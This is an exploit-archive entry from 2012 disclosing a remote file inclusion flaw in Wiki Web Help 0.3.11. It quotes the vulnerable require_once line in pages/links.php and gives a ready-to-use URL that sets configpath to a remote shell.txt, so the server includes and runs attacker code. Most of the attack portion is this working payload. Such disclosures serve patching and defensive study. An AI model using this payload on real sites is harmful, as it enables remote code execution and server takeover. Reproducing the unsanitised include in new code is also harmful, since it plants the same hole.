Wiki Web Help 0.3.11 Remote File Inclusion Vulnerability

2012-09-04T00:00:00
ID 1337DAY-ID-19317
Type zdt
Reporter L0n3ly-H34rT
Modified 2012-09-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ############################################
### Exploit Title: Wiki Web Help v0.3.11 Remote File Inclusion Vulnerability
### Date: 04/9/2012 
### Author: L0n3ly-H34rT 
### Contact: [email protected] 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://wikiwebhelp.org/
### Software Link: http://sourceforge.net/projects/wwh/files/wwh-0.3.11.7z/download
### Version: 0.3.11
### Tested on: Linux/Windows 
############################################

# File affect ( pages/links.php ) on line 5:

require_once("$configpath/config.php");

# Example :

http://127.0.0.1/wwh/pages/links.php?configpath=http://127.0.0.1/shell.txt?

############################################

# Greetz to my friendz



#  0day.today [2018-04-08]  #